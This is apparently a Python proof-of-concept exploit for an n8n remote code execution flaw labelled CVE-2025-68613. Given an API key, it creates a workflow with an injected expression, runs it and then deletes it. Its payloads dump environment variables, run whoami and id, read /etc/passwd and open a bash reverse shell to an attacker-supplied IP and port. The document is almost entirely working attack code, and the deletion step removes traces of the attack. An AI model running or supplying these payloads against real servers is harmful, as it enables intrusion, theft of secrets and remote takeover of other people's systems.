import requests import json import argparse import sys def exploit_n8n(base_url, api_key, payload_type, attacker_ip=None, attacker_port=None): # Remove trailing slash if present if base_url.endswith('/'): base_url = base_url[:-1] headers = { 'Content-Type': 'application/json', 'X-N8N-API-KEY': api_key } # Available payloads payloads = { 'env_leak': "{{ (function() { return process.env; })() }}", 'whoami': "{{ require('child_process').execSync('whoami').toString() }}", 'id': "{{ require('child_process').execSync('id').toString() }}", 'read_file': "{{ require('fs').readFileSync('/etc/passwd', 'utf8') }}", 'reverse_shell': f"{{{{ require('child_process').exec('bash -c \"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1\"') }}}}" } if payload_type not in payloads: print(f"[!] Invalid payload type. Available: {', '.join(payloads.keys())}") sys.exit(1) selected_payload = payloads[payload_type] if payload_type == 'reverse_shell' and (not attacker_ip or not attacker_port): print("[!] reverse_shell requires --attacker_ip and --attacker_port") sys.exit(1) # Minimal workflow with Set node containing the malicious expression workflow = { "name": "CVE-2025-68613 PoC", "nodes": [ { "parameters": {}, "name": "Start", "type": "n8n-nodes-base.manualTrigger", "typeVersion": 1, "position": [240, 300] }, { "parameters": { "values": { "string": [ { "name": "output", "value": selected_payload } ] }, "options": {} }, "name": "Exploit", "type": "n8n-nodes-base.set", "typeVersion": 3, "position": [460, 300] } ], "connections": { "Start": { "main": [ [ { "node": "Exploit", "type": "main", "index": 0 } ] ] } }, "active": False, "settings": {}, "tags": [] } # Create workflow print("[+] Creating malicious workflow...") create_resp = requests.post(f"{base_url}/rest/workflows", headers=headers, json=workflow) if create_resp.status_code not in (200, 201): print(f"[-] Failed to create workflow: {create_resp.status_code} {create_resp.text}") sys.exit(1) workflow_id = create_resp.json()['id'] print(f"[+] Workflow created with ID: {workflow_id}") # Execute workflow print("[+] Executing workflow...") exec_resp = requests.post(f"{base_url}/rest/workflows/{workflow_id}/run", headers=headers) if exec_resp.status_code != 200: print(f"[-] Failed to execute workflow: {exec_resp.status_code} {exec_resp.text}") else: result = exec_resp.json() print("[+] Execution result:") if 'data' in result and 'result' in result['data']: output = result['data']['result']['data']['main'][0][0]['json'] print(json.dumps(output, indent=2)) else: print(json.dumps(result, indent=2)) # Cleanup print("[+] Cleaning up (deleting workflow)...") delete_resp = requests.delete(f"{base_url}/rest/workflows/{workflow_id}", headers=headers) if delete_resp.status_code == 200: print("[+] Workflow deleted successfully") else: print(f"[-] Failed to delete workflow: {delete_resp.text}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-68613 n8n RCE Exploit PoC") parser.add_argument("--url", required=True, help="Base URL of n8n instance (e.g. https://n8n.example.com)") parser.add_argument("--api_key", required=True, help="n8n API key (X-N8N-API-KEY)") parser.add_argument("--payload", required=True, choices=['env_leak', 'whoami', 'id', 'read_file', 'reverse_shell'], help="Payload type to execute") parser.add_argument("--attacker_ip", help="Your IP for reverse shell") parser.add_argument("--attacker_port", help="Your listening port for reverse shell") args = parser.parse_args() exploit_n8n(args.url, args.api_key, args.payload, args.attacker_ip, args.attacker_port)